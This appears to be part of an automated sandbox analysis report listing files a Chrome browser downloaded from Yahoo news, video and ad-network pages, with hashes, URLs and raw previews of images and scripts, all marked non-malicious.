                                                                                                                                                                                                                  Preview:(function(t,i){if(typeof define==="function"&&define.amd){define("bc",[],function(){var e=i.apply(this,arguments);t.videojs.log.warn("DEPRECATION: Using the default named RequireJS module in the Brightcove Player is deprecated. See: https://support.brightcove.com/requirejs-and-brightcove-player#Future_implementation");return e})}else if(typeof exports==="object"){module.exports=i()}else{t.bc=i(t)}})(this,function(e){var t='.vjs-svg-icon{display:inline-block;background-repeat:no-repeat;background-position:center;fill:currentColor;height:1.8em;width:1.8em}.vjs-svg-icon:before{content:none!important}.vjs-control:focus .vjs-svg-icon,.vjs-svg-icon:hover{filter:drop-shadow(0 0 .25em #fff)}.video-js .vjs-big-play-button .vjs-icon-placeholder:before,.video-js .vjs-modal-dialog,.vjs-button>.vjs-icon-placeholder:before,.vjs-modal-dialog .vjs-modal-dialog-content{position:absolute;top:0;left:0;width:100%;height:100%}.video-js .vjs-big-play-button .vjs-icon-placeholder:before,.vjs-button>.vjs-icon
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):15808
                                                                                                                                                                                                                  Entropy (8bit):7.961528257636003
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:77C0542ACDE25631C632A519F8C5E488
                                                                                                                                                                                                                  SHA1:16A5B30AAE8E7D7BEEA5A62D662D97F3CDBA50AC
                                                                                                                                                                                                                  SHA-256:CB6D980726475D9241552CF1B326C255ED69559119555474CFAB93EFE438E9DC
                                                                                                                                                                                                                  SHA-512:E46A95513214636B5CE8A72C141704FBE13694AB3653162362EFE0DFF0B20EC910152CCECADFD060BE574C802137D6252F58371742257BB041D8409A1429AEA5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/25s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/25s/match/image.jpeg*~hmac=ab89da713c12e289dc5150b78d016badbde9231ee877b3ad68a0a2317fcbd0cd
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C........................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...C...........7%.%77777777777777777777777777777777777777777777777777...........".......................................G.........................!1.AQ."aq..2R..#B...3CS......$brs.4DTc...5E.................................-........................!1.QA.."2aq.3.B................?....0..'.....h.N......8.D5O!4U..j...s.)...14=.=...-..5O...#m..tR.0..m..b...VR..d.....W@N.2.....7...E.d.pL..A.w.4y.....p...&.{..Q..1.J..-..5..k....TD~...G.A|.1.".........L...)..`..F#!...X...F.}..E.i.GzF.7........*.5.......y.,.*....\%..\$}.\..[.A...o..~W)..(....iP{ux...T |.,?..WN.........T..Vj7..S&.....S....S2.._..5..R..uf2.gc........FUN.f...'|....od=D.g.c.6....X:..>.3.N..Y.4$.ij.i.........3.SR..O!e=/h......s..5.'.?a".F..bXDV.5[]o...x.....o.l....P..e0..\Z.O5..cf7..l../$..!............0...b........o@>J.S... .|....+{|:..lY../`......1.t...G....v0.......6.`O.P.%.....b0..I....rJ<...
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 41 x 330, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2986
                                                                                                                                                                                                                  Entropy (8bit):7.595859761626018
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C2396079060A7028FA898A73B72AA592
                                                                                                                                                                                                                  SHA1:81EE85D797FF9C40A19B15E4130D7F677011C5A0
                                                                                                                                                                                                                  SHA-256:1A166EBD6C8872D71EFCEFB4765DB513014B732E1886525C5F2D5DED87071451
                                                                                                                                                                                                                  SHA-512:AC8F6403C6F5CD0ACEB315C0EE48DA6A3540D4C012A15A754EFEFE069CB33B6AA3124C3C5C7746185CE4A3EED7898A1AE07C170501AC78CAC16290084255CCA6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:.PNG........IHDR...)...J............jPLTE...IIY..........#)E..\el.")...\dk!w..j.....j..j.'/;.:.....;.....i.....i....#+1$,4.j..............i.$+3....;..:.#*2.i..;.#+2.;.....j.....j..j..m..i........l..:....#+2#+1\dj.#).j..k..k.#(/.l.&-5.;..n..n....**7....j..:.....j.....;.....k..l.#*2.i..:.#*1.:..i..i........i........;........;.$+1....=...."%,#,5.j..i........j.....j.....j.....j...........n....#+1[dj.").:.$+1....:.$*2.:..j.......#+2.......j..;.$*2.j.....k..;....$+3.l...._fk`gn...ddm$$..A....[mm.l..i.....j....\cj................j..k..l..k..l..j.$*2.j..:.....j.#+2.;.#+1...$+1.;..k..j..:.#+4.;.$+2.i..<.%.3.=..@........j.....l.....i..C..w..i.....:.#*1[cj."(....Z.N....tRNS....*.........x.........@/....j./...eW'...V#"......}}lbR/+'#...........w8&...........ji^QPJ($$............N;/..................{xtqpoaZN?0%!............|dZZI<2!.........~{tng`^KGB972...ePG33....k....(IDATh...W.0....).Q..O.pC.......((....,...{...{o.V..Lz'......D}~..%m?$M..{m....u...=W.d.u8.....3**(....bT@.b..x...
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4858
                                                                                                                                                                                                                  Entropy (8bit):7.742803949473407
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C6B6EA2192887B0A7C0EA4359E596BB7
                                                                                                                                                                                                                  SHA1:02562EE1422C9E6F8635DF51D67B01E0039BA655
                                                                                                                                                                                                                  SHA-256:A5E76532B18F8EECEEDA849B5AB41DD2F44A462259E7FF2D3C4BAF1F1EDEFAF2
                                                                                                                                                                                                                  SHA-512:4F348987CBF0A323B19C064BCC3D73955674AB64A01DCF2A8038C77B0DA032C6EA60122B0CB7DCEE2C0C2EDB7FE50294FBD5100B4F79E749A1B0EF64238327C8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/OlR6PVBtogbjW8cktRsq8w--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/cbs_news_897/229eb2ac70e1f8e84557dbaf4f3edfb9.cf.webp
                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X.... ...c.....ICCP4......4........mntrRGB XYZ .........+.8acsp.......................................-....................................................desc.......ybkpt...x....wtpt........cprt........rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........sRGB IEC61966-2-1 black scaled..................................................................................XYZ ...........3....XYZ ...............-text....Dropbox, Inc....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............b...k...@.Q.4!.).2.;.F.Qv].kpz....|.i.~...7..VP8 ....P]...*d...>y:.I.."........gn4P..[./..M.......g...]+L.#.....z.2../3...S.W..t...I$....b@....xn..A.._,.nx.....BM"...|..R.R2BU........`.x.[..d]...CI.Y..(..1.L.."g..(..].sG..Z.8se.P4t'........'........drzq.....4R.=......G..}.a.B........p8B.;..E.7.{V..D.@..G..2.9,B....Yc.X.>..E.[...:.9..@,....X......l.H....0..8.i.L.m.....X...pSa...(<...P-...#."....w.4."#(.Xx.2.....?6!.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (30142), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):30142
                                                                                                                                                                                                                  Entropy (8bit):5.262622575589199
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D133CBEA9C1D56D1CBE4CB6E77F0EBF6
                                                                                                                                                                                                                  SHA1:9474B4E8F5149B1124468C4590E850F7BBF141F3
                                                                                                                                                                                                                  SHA-256:5E1E920D663D0BC1E363EC56C7FCCDEDD061F95FA60158C3AF425DAA952027CA
                                                                                                                                                                                                                  SHA-512:29A9268266585F047F69B565CDF5B1199A6D729A452513A0D534C0FA0B5886D46B7F9EDCB5948340DF45B1C4E9C942E61C53FEF102A7DBEBFF1C2191263C791B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-video-3.2.2-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-video"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(i[a])return i[a].exports;var n=i[a]={i:a,l:!1,exports:{}};return e[a].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i={};return t.m=e,t.c=i,t.d=function(e,i,a){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var i=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,i){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 150x150, segment length 16, baseline, precision 8, 401x226, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):11249
                                                                                                                                                                                                                  Entropy (8bit):7.939437701828917
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:ACCA97FA950528EBB8D6016A66C831EB
                                                                                                                                                                                                                  SHA1:8D40FDE60F9AD29EE6921DC8A5037A1E132D5209
                                                                                                                                                                                                                  SHA-256:28E9D3AB778CB87E45A5CC09E0DB623104DA4533E28FAA859BC1016AB9FBF6E4
                                                                                                                                                                                                                  SHA-512:B8C538C91886911C01013ECA660F1BFC311AC1179FFE3B71F2FF2DC90B036D224414E5E859417D5B5EC47B2514489276EA6527EBF188A69A245EC0C4EBC7AB33
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/EEhMEMajzouGr62KXxLQRA--~B/Zmk9c3RyaW07aD0yMjY7dz00MDE7c209MTthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/cnn_videos_177/2b33a43611ff23744b84f32e94939209
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."........................................A.........................!.1AQ.a."2q....#BR..3r...$b...CSTc....................................2........................!.1."2AQ.q.Ba.......CR..............?..tPI.."........r.P..GT....!p7.a?.iD....K....JqAA...v.D..$.E.D.D.r(.."PA0.)......D....!..A....a,".H..5 ..#tp...E$P.q.n...)...).$.@.GdBG.d...XHsE2@..0.E..jYE..@.XI.+#..i..."..T.djI.|.O..K.R!?.ay..`..N..S"....z.L...8G."..$.Gd.cJ.G.....I$D`A....H..("...".aX.H.S!X.I$D.......E.R...YA.. .I.$..$.K;.Q.0...`.;".E...1rC.E..LV..94sN.N.0.JqMA.$.. '.r......i.kWF....S.....).....i...5.T.P.,P.RH..-.eua.....S.+...%g.>I-_..~..C......=.......@...FPO..&+q..ziE...I$........."y..F...0.+h.RK.I.[.D:..S"0..'.2..Ie....).NH.Ehn.!......PE..$J..4sNMG*!E...,.J9..A,..wED...@..@....Ij).&O .RI...Y.I..M..l.<........x..};..X...+.X.\.H...C...#..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):269
                                                                                                                                                                                                                  Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                  SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                  SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                  SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://eus.rubiconproject.com/usync.html?&geo=na&co=us
                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):12896
                                                                                                                                                                                                                  Entropy (8bit):7.946557538548957
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D6B28F3DBCF07EA8CF9C99DF04787AE7
                                                                                                                                                                                                                  SHA1:6FA9C61EDEFB9CDD1107EC72405D46265616AD9F
                                                                                                                                                                                                                  SHA-256:4FA8BCEA42B0EF7E3E085A9AEDF8E2574652D1D5356E29724451DD7DE63E0E0C
                                                                                                                                                                                                                  SHA-512:145F2DF7338AAF3745A1C76F693AF326EE30D2206AAF7AA1D4E625ABF5BE4ED4DBF72FA58769BFA7A74B97EBAA1841A6EB06C46275676D1F450D9C5CA635DB84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/40s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/40s/match/image.jpeg*~hmac=cd2e164225d4b22a5567301c631d808b57fa007cdc5cee9feacd953ba9e3462c
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C........................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...C...........7%.%77777777777777777777777777777777777777777777777777..........."........................................C.........................!1..AQ"aq.2R...B...#3Cb..$4Sr....6ct.................................#........................!.1Aa2BQ"............?...!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!..!...P...Tt....L.L...;..+Sk....b..i..k..2...m..+.........p&$.2.....K.w......m5.D....E..Q''.......`56p:i....1.....~..X.........CCE}Phg...[/..H7...6...t..3bk......]2..~..P.p..UbTu5":.7...f~k....F.n...cb...[.a...X............).........."g^AkY...A...Vk&...)........mE.T.....p....c5.q...,.3.5..m...........,.....#n.,.O.+dtn.......J.X..k......re...4Z.....;f..Z........j.Z....9......r.Yq~.^.s..u.D....6..c%p.7....V.Z....=.L........B,HH. .. .. .0D?.H ...^.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (5657)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):6162
                                                                                                                                                                                                                  Entropy (8bit):5.599076700545423
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6AAAF8E11A32FD37FB419E3A4CE9696C
                                                                                                                                                                                                                  SHA1:1FD88F2EE4DE5422E0C344DEBEFE3F2B5ABB2592
                                                                                                                                                                                                                  SHA-256:468959E93F9B4E6F07C6A8F8D0E93D8FCB37D76A8615A93EC153F5842247BA99
                                                                                                                                                                                                                  SHA-512:748B27BDB7C7FA082D7BE6C69F56DC33302105784391320A5CF960531C594097BC406FD3F4690E4CF74F4016F4D56804A4296E9BD885562EB66699E1318F7000
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://16f8f50d43b369c26e4287c3f36edbbe.safeframe.googlesyndication.com/safeframe/1-0-40/html/container.html
                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8">. <title>SafeFrame Container</title>. <script>.(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var f=this||self,h=function(a){return a};var n=function(a,b){this.h=a===l&&b||"";this.g=m},p=function(a){return a instanceof n&&a.constructor===n&&a.g===m?a.h:"type_error:Const"},m={},l={};var r=void 0;/*.. SPDX-License-Identifier: Apache-2.0.*/.var t,aa=function(){if(void 0===t){var a=null,b=f.trustedTypes;if(b&&b.createPolicy){try{a=b.createPolicy("goog#html",{createHTML:h,createScript:h,createScriptURL:h})}catch(c){f.console&&f.console.error(c.message)}t=a}else t=a}return t};var ca=function(a){this.g=ba===ba?a:""};ca.prototype.toString=function(){return this.g+""};var ba={},da=function(a){var b=aa();a=b?b.createScriptURL(a):a;return new ca(a)};var ea={},u=function(a,b){this.g=b===ea?a:""};u.prototype.toString=function(){return this.g.toString()};var ha=function(){var a=v,b={messa
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):122423
                                                                                                                                                                                                                  Entropy (8bit):5.3056458715988395
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:661720E9144809B7D5782334067275F8
                                                                                                                                                                                                                  SHA1:6BFBAC182883718C1277BE99D4F8F7D20F1D7F57
                                                                                                                                                                                                                  SHA-256:3AC4C08A43555DE5EA767928C164A7713542381D19814EF12680BCD9EB8723C8
                                                                                                                                                                                                                  SHA-512:5C8FE65CD328A071AA87BFE9072FE016FA32F75DBA744667FAB5AA0FB0328E8388BF527A0EEC27BA3597B036E99BC3AB5F15747DD76456F782975627964DA10A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/c/6bfbac1.caas-news_web.min.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("CAAS",[],t):"object"==typeof exports?exports.CAAS=t():e.CAAS=t()}(self,(function(){return function(){var e,t,s,o,a={"./node_modules/@vzmi/caas-static/src/lazy/js/index.js":function(e,t,s){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s("./node_modules/@vzmi/caas-static/src/util/js/index.js");const a="loading"in HTMLImageElement.prototype,i="data-caas-lazy-loading-init";let n,l;function r(e,t){return e.nodeName.toLowerCase()===t}function d(e,t){const s=e._util,{pendingClass:a}=e.options;return()=>{if((0,o.elementInView)(t,e.options,s._viewport)){const o=s.elements.indexOf(t);e.load(t),s.elements.splice(o,1),s.count--,0===s.count&&e.destroy()}(0,o.removeClass)(t,a)}}function c(e){const t=e._util,{pendingClass:s,successClass:i,timeout:n}=e.options;for(let l=0;l<t.count;l++){const c=t.elements[l],m=a&&r(c,"img"),u=!m&&(0,o.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (32022)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):106219
                                                                                                                                                                                                                  Entropy (8bit):5.58755713318667
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5653A32A9062A07973119E60A4AA137D
                                                                                                                                                                                                                  SHA1:FF1F60B0B7CF083C427E9A6DF8BF5249A9683870
                                                                                                                                                                                                                  SHA-256:76BF14CA819A9475D1B49E77DF5D807E2C011F027026A113141DCBDCCBD84573
                                                                                                                                                                                                                  SHA-512:9B43BDB451D1758C54026DE415E93500997BDD0319D8A24BCC09750CCC0786553D3EE0E3E30A9403D015890F56275E1F2A90C33D9D45F6CC823C141AD4C4D8CD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (2920), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2920
                                                                                                                                                                                                                  Entropy (8bit):5.278382327824268
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:653708AD1BBAE1579927B6391B2A28F3
                                                                                                                                                                                                                  SHA1:4261E415C23DFD9D925F071737FB0D236F856F4E
                                                                                                                                                                                                                  SHA-256:82D2DC44AAE1EDA52ABC17AFD30C6031B7175C13EE6955410164C66AE755ADFB
                                                                                                                                                                                                                  SHA-512:4092D81BEEAADB7ECA73EE279AF0A5289CAF850253464BAA4F7695C49670C05F7E89630807A2C41D3D9CAD75D95A60719FDB1A16265537153952774F7450873C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://js-sec.indexww.com/um/ixmatch.html
                                                                                                                                                                                                                  Preview:<!doctype html><head></head><body><script>!function(t){var e={};function r(n){if(e[n])return e[n].exports;var i=e[n]={i:n,l:!1,exports:{}};return t[n].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=e,r.d=function(t,e,n){r.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(t,e){if(1&e&&(t=r(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)r.d(n,i,function(e){return t[e]}.bind(null,i));return n},r.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(e,"a",e),e},r.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},r.p="",r(r.s=0)}([function(t,e){let r=!1;const n={};let i,a,o,c;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14158
                                                                                                                                                                                                                  Entropy (8bit):7.903189951479307
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:618E8FA83C9670138A46DAF792AFABB2
                                                                                                                                                                                                                  SHA1:154A6310412494BCE30F0A98EEDC772A82EDC71C
                                                                                                                                                                                                                  SHA-256:1E6C52C194B53CA2ACF8BCBFEB5662FF03F70F159FFDD4AD79E4CA21E3016945
                                                                                                                                                                                                                  SHA-512:0D4D3F7F0931E739F5F287FD608D46C545ECAB9327E22F933C7B7C1442C1EE72003974CF9EC847486339D4504F276870B097E6D3028EF5ECC9F82622EAB8FB9F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............DICC_PROFILE......4........mntrRGB XYZ .........+.8acsp.......................................-....................................................desc.......ybkpt...x....wtpt........cprt........rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........sRGB IEC61966-2-1 black scaled..................................................................................XYZ ...........3....XYZ ...............-text....Dropbox, Inc....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............b...k...@.Q.4!.).2.;.F.Qv].kpz....|.i.~...7.....C....................................................................C.........................................................................d............................................>.........................!1.A."Qa..2q....B...#R..3...$.4Cbr................................(......................!..1A..."aQ$2Bq.............?...|..c....]...g...;Vt..=....Q5p$9...!3Yi._S.....1n`R.|..5.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13714), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13714
                                                                                                                                                                                                                  Entropy (8bit):5.23465777657958
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:94D07DAA349C254B35FFCDA6E54CC754
                                                                                                                                                                                                                  SHA1:C46D6650E0F01C7F2977182F8FE5D5A07ABA9EE5
                                                                                                                                                                                                                  SHA-256:0291E42C6C243B4177E0331B6E3692A8E03E29A39852790CE81604A998872C68
                                                                                                                                                                                                                  SHA-512:8B3FEB7625D38BD50F22B838A14868D15EEBE1DFE6715A422B777A267585A1BAF9DE5982A29089C6BB7C0FC3DEAE8CE8B57F1BE851F78F1EECC9B625F08917CB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-form",[],t):"object"==typeof exports?exports["wafer-form"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-form"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r=window.webpackJsonpwafer_wafers_wafer_form;window.webpackJsonpwafer_wafers_wafer_form=function(t,n,o){for(var a,s,u=0,l=[];u<t.length;u++)s=t[u],i[s]&&l.push(i[s][0]),i[s]=0;for(a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a]);for(r&&r(t,n,o);l.length;)l.shift()()};var n={},i={1:0,2:0};return t.e=function(e){function r(){s.onerror=s.onload=null,clearTimeout(u);var t=i[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),i[e]=void 0)}var n=i[e];if(0===n)return new Promise(function(
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15735)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):15774
                                                                                                                                                                                                                  Entropy (8bit):5.3538214812563885
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:46EC7CD52EE9F5C1236B0DEA5072690A
                                                                                                                                                                                                                  SHA1:CF9337DE42260986BA6EC460E64AB5120A3E5445
